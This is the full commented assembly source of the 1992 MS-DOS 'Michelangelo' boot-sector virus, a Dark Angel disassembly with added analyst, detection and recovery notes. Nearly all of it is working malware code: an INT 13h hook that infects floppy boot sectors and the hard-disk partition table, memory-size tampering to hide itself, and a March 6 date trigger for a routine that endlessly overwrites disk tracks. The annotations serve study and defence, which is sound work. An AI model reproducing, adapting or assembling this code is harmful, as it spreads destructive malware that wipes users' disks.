"Michelangelo" virus source code
This is the commented assembly source code of the MS-DOS virus "Michelangelo", created in 1992, which activates every year on March 6 (the Italian artist Michelangelo was born on March 6, 1475 in Caprese, near Arezzo).
; This is a disassembly of the much-hyped michelangelo virus.
; As you can see, it is a derivative of the Stoned virus. The
; junk bytes at the end of the file are probably throwbacks to
; the Stoned virus. In any case, it is yet another boot sector
; and partition table infector.
; Analyst overview: one 16-bit real-mode segment assembled at offset 0.
; Execution starts at the jmp below, which skips the data fields that follow
; it and continues at entervirus.
michelangelo segment byte public
assume
cs:michelangelo, ds:michelangelo
; Disassembly by Dark Angel of PHALCON/SKISM
org
0
jmp
entervirus
; highmemjmp: far pointer (offset 00F5h plus a segment word) used by the far
; jmp at the end of entervirus. entervirus overwrites the segment word at run
; time, so the 9F80h stored here is only the value captured in this sample.
highmemjmp db 0F5h,
00h, 80h, 9Fh
; maxhead: limit compared against dh in the damagestuff loop; damagestuff
; raises it to 4 when its target is the first hard disk.
maxhead db 2
;
used by damagestuff
; firstsector: CX value (cylinder/sector) of the place where the displaced
; original boot sector is stored: 3 or 0Eh on floppies, 7 on the first hard
; disk. The boot path reads the original sector back from there, so this is
; also where an unmodified copy can be looked for during recovery.
firstsector dw 3
; oldint13h: saved far address of the previous INT 13h handler. It is
; rewritten from the interrupt vector table on every boot, so the constant
; below is residue from the sample that was disassembled.
oldint13h dd 0C8000256h
; int13h: replacement INT 13h (BIOS disk services) handler installed by
; entervirus. A request for any drive other than 0 (dl != 0), or one made
; while bit 0 of the byte at 0:043Fh is set, is passed straight to the
; previous handler via exitint13h. Otherwise the previous handler is called
; first, infectdisk runs afterwards, and the caller receives the flags
; produced by its own request.
int13h:
push
ds
push
ax
or
dl, dl ;
default drive?
jnz
exitint13h ;
exit if not
xor
ax, ax
mov
ds, ax
; NOTE(review): the annotation on the jnz below reads "if not spinning, exit",
; but jnz is taken when the tested bit is set, i.e. when the source's own
; "disk 0 on?" condition is true.
test
byte ptr ds:[43fh], 1 ; disk 0 on?
jnz
exitint13h ;
if not spinning, exit
pop
ax
pop
ds
; pushf followed by a far call builds the same stack frame an INT instruction
; would, so the previous handler can be entered as if by INT 13h.
pushf
call
dword ptr cs:[oldint13h]; first call old int 13h
; Save the flags returned by the real disk operation across infectdisk.
pushf
call
infectdisk ;
then infect
popf
; retf 2 returns to the interrupted caller and discards its saved flags word,
; so the flags restored by popf above are the ones the caller sees.
retf
2
; Pass-through path: restore the two saved registers and chain to the
; previous handler without doing anything else.
exitint13h: pop ax
pop
ds
jmp
dword ptr cs:[oldint13h]
; infectdisk: near routine called from int13h after a drive-0 request.
; It saves every register it uses, points ds and es at its own segment, and
; reads cylinder 0 / head 0 / sector 1 of drive 0 into cs:0200h (up to 4
; attempts, resetting the disk after each failed read). If the first two
; words of that sector equal the first two words at offset 0 of this code,
; it returns without writing. Otherwise it stores the original sector on
; head 1 (sector 3 when the byte at offset 15h of the sector is 0FDh, else
; sector 0Eh), copies 21h words from the partitioninfo offset of the original
; sector into its own image, and writes the image to sector 1.
; Detection note: because of the self-check, an infected sector begins with
; the same four bytes as offset 0 of this listing.
infectdisk:
push
ax
push
bx
push
cx
push
dx
push
ds
push
es
push
si
push
di
push
cs
pop
ds
push
cs
pop
es
; si = number of read attempts allowed.
mov
si, 4
readbootblock:
mov
ax,201h ;
Read boot block to
mov
bx,200h ;
after virus
mov
cx,1
xor
dx,dx
pushf
; NOTE(review): written without the "dword ptr cs:" form used in int13h;
; presumably the same far call through the saved vector - confirm against
; the binary.
call
oldint13h
jnc
checkinfect ;
continue if no error
xor
ax,ax
pushf
call
oldint13h ;
Reset disk
dec
si ;
loop back
jnz
readbootblock
jmp
short quitinfect ;
exit if too many failures
checkinfect:
; si = 0, so each lodsw reads a word from offset 0 of this code's own segment
; and compares it with the sector just read at bx.
xor
si,si
cld
lodsw
cmp
ax,[bx] ;
check if already infected
jne
infectitnow
lodsw
cmp
ax,[bx+2] ;
check again
je
quitinfect
infectitnow:
; The write below replaces whatever was previously stored in the chosen
; head-1 sector with the original boot sector (bx still points at cs:0200h).
mov
ax,301h ;
Write old boot block
mov
dh,1 ;
to head 1
mov
cl,3 ;
sector 3
cmp
byte ptr [bx+15h],0FDh ; 360k disk?
je
is360Kdisk
mov
cl,0Eh
is360Kdisk:
; Record where the original sector went; the boot path and damagestuff both
; read this value back.
mov
firstsector,cx
pushf
call
oldint13h
jc
quitinfect ;
exit on error
mov
si,200h+offset partitioninfo
mov
di,offset partitioninfo
mov
cx,21h ;
Copy partition table
cld
rep
movsw
mov
ax,301h ;
Write virus to sector 1
xor
bx,bx
mov
cx,1
xor
dx,dx
pushf
call
oldint13h
; Common exit: restore the registers saved on entry, in reverse order.
quitinfect:
pop
di
pop
si
pop
es
pop
ds
pop
dx
pop
cx
pop
bx
pop
ax
retn
; entervirus: boot-time entry, running from the sector image at 0:7C00h.
;  1. Sets ss:sp to 0:7C00h and pushes 0:7C00h as the target of a later retf.
;  2. Saves the INT 13h vector found at 0:004Ch into oldint13h.
;  3. Subtracts 2 from the word at 0:0413h (annotated in the source as
;     "memory size in K") and turns the result into a segment (shl by 6).
;  4. Points the INT 13h vector at int13h in that segment, copies everything
;     up to partitioninfo there, and continues through the highmemjmp pointer.
; Defender note: a memory-size word at 0:0413h that is lower than the
; installed base memory, together with an INT 13h vector whose segment equals
; that lowered value times 64, are the in-memory traces this code leaves.
entervirus:
xor
ax,ax
mov
ds,ax
cli
mov
ss,ax
mov
ax,7C00h ;
Set stack to just below
mov
sp,ax ;
virus load point
sti
push
ds ;
save 0:7C00h on stack for
push
ax ;
later retf
; Addresses are written as 7C00h + offset because ds is 0 here and the code
; has not been relocated yet.
mov
ax,ds:[13h*4]
mov
word ptr ds:[7C00h+offset oldint13h],ax
mov
ax,ds:[13h*4+2]
mov
word ptr ds:[7C00h+offset oldint13h+2],ax
mov
ax,ds:[413h] ;
memory size in K
; NOTE(review): the "1024 K" annotation on the first dec is unclear; the two
; dec instructions together lower the stored value by 2.
dec
ax ;
1024 K
dec
ax
mov
ds:[413h],ax ;
move new value in
mov
cl,6
shl
ax,cl ;
ax = paragraphs of memory
mov
es,ax ;
next line sets seg of jmp
mov
word ptr ds:[7C00h+2+offset highmemjmp],ax
; Replace the INT 13h vector: offset of int13h, segment of the reserved area.
mov
ax,offset int13h
mov
ds:[13h*4],ax
mov
ds:[13h*4+2],es
; Copy "offset partitioninfo" bytes, i.e. everything before partitioninfo.
mov
cx,offset partitioninfo
mov
si,7C00h
xor
di,di
cld
rep
movsb ;
copy to high memory
;
and transfer control there
jmp
dword ptr cs:[7C00h+offset highmemjmp]
; Continuation in the relocated copy (target of highmemjmp). It resets the
; disk and then reloads the displaced original sector to 0:7C00h:
;   firstsector == 7 : read sector 7 of the first hard disk (dx = 80h).
;   otherwise        : read firstsector from head 1 of drive 0 (dx = 100h),
;                      then read sector 1 of the first hard disk to cs:0200h
;                      and go to infectharddisk unless its first two words
;                      match the first two words of this code.
; exitvirus then calls INT 1Ah function 4 and compares dx with 0306h
; (annotated in the source as mon/day, March 6th): equal goes to damagestuff,
; anything else does retf to the original sector at 0:7C00h.
; Defender note: this date check sits only on the boot path, so damagestuff is
; reached only when the machine boots from infected media while the clock
; reports that date.
; destination of highmem jmp
xor
ax,ax
mov
es,ax
int
13h ;
reset disk
push
cs
pop
ds
mov
ax,201h
mov
bx,7C00h
mov
cx,firstsector
cmp
cx,7 ;
hard disk infection?
jne
floppyboot ;
if not, do floppies
mov
dx,80h ;
Read old partition table of
int
13h ;
first hard disk to 0:7C00h
jmp
short exitvirus
floppyboot:
mov
cx,firstsector ;
read old boot block
mov
dx,100h ;
to 0:7C00h
int
13h
jc
exitvirus
; es = cs so the hard-disk sector lands at cs:0200h, next to the resident
; copy, for the comparison below.
push
cs
pop
es
mov
ax,201h ;
read boot block
mov
bx,200h ;
of first hard disk
mov
cx,1
mov
dx,80h
int
13h
jc
exitvirus
; Same four-byte self-check as infectdisk: offset 0 of this code against the
; start of the sector at bx.
xor
si,si
cld
lodsw
cmp
ax,[bx] ;
is it infected?
jne
infectharddisk ;
if not, infect HD
lodsw
;
check infection
cmp
ax,[bx+2]
jne
infectharddisk
exitvirus:
xor
cx,cx ;
Real time clock get date
mov
ah,4 ;
dx = mon/day
int
1Ah
cmp
dx,306h ;
March 6th
je
damagestuff
; Uses the 0:7C00h far address pushed by entervirus.
retf
;
return control to original
;
boot block @ 0:7C00h
; damagestuff: destructive payload, reached only from exitvirus. Starting at
; cylinder 0 / head 0 / sector 1 it issues INT 13h writes (ah = 3) from the
; buffer at 5000h:5000h, whose contents this code never sets:
;   firstsector == 3   : drive 0, 9 sectors per write
;   firstsector == 0Eh : drive 0, 0Eh sectors per write
;   otherwise          : drive 80h, 11h sectors per write, maxhead set to 4
; After each write dh is incremented until it reaches maxhead; then dh is
; cleared, ch is incremented and the loop repeats. There is no exit from the
; loop.
; Recovery-relevant limits visible in the code: only heads below maxhead and
; the first al sectors of each track are written, and only ch is advanced
; (cl stays 1 throughout).
damagestuff:
xor
dx,dx
mov
cx,1
smashanothersector:
mov
ax,309h
mov
si,firstsector
cmp
si,3
je
smashit
mov
al,0Eh
cmp
si,0Eh
je
smashit
mov
dl,80h ;
first hard disk
mov
maxhead,4
mov
al,11h
smashit:
mov
bx,5000h ;
random memory area
mov
es,bx ;
at 5000h:5000h
int
13h ;
Write al sectors to drive dl
; NOTE(review): the "skip on error" annotation on the jnc below is misleading;
; jnc skips the reset when the write succeeded, and the reset runs only after
; an error.
jnc
skiponerror ;
skip on error
xor
ah,ah ;
Reset disk drive dl
int
13h
skiponerror:
inc
dh ;
next head
cmp
dh,maxhead ;
2 if floppy, 4 if HD
jb
smashanothersector
xor
dh,dh ;
go to next head/cylinder
inc
ch
jmp
short smashanothersector
; infectharddisk: reached from the floppy boot path when sector 1 of the first
; hard disk does not start with the first two words of this code. On entry
; es:bx still addresses the copy of that sector read to cs:0200h.
;  1. Records 7 in firstsector and writes the original sector to sector 7 of
;     drive 80h (cx = 7, dx = 80h), replacing whatever was stored there; a
;     write error goes to exitvirus.
;  2. Copies 21h words from the partitioninfo offset of the original sector
;     into the resident image.
;  3. Writes the image (bx = 0) to drive 80h with cx = 1.
; Recovery note: the unmodified original sector is the copy stored in step 1.
infectharddisk:
mov
cx,7 ;
Write partition table to
mov
firstsector,cx ;
sector 7
mov
ax,301h
mov
dx,80h
int
13h
jc
exitvirus
mov
si,200h+offset partitioninfo ; Copy partition
mov
di,offset partitioninfo ;
table information
mov
cx,21h
rep
movsw
; NOTE(review): the "Write to sector 8" annotation below does not match the
; code. rep movsw leaves cx = 0 and inc cl makes it 1, so this write targets
; sector 1, as the annotation after it says.
mov
ax,301h ;
Write to sector 8
xor
bx,bx ;
Copy virus to sector 1
inc
cl
int
13h
; The two bytes below encode a short jump that the disassembler kept as raw
; data; its intended target is not evident from this listing.
;* jmp
short 01E0h
db
0EBh, 32h ;
?This should crash?
; The following bytes are meaningless.
; garbage: 16 bytes that no instruction in this listing references.
garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
; partitioninfo: 42h-byte area, zero in this listing. Both infection routines
; fill it with 21h words copied from the same offset of the victim's original
; sector before the image is written out; entervirus copies only the bytes
; that precede it.
partitioninfo: db 42h dup (0)
michelangelo ends
end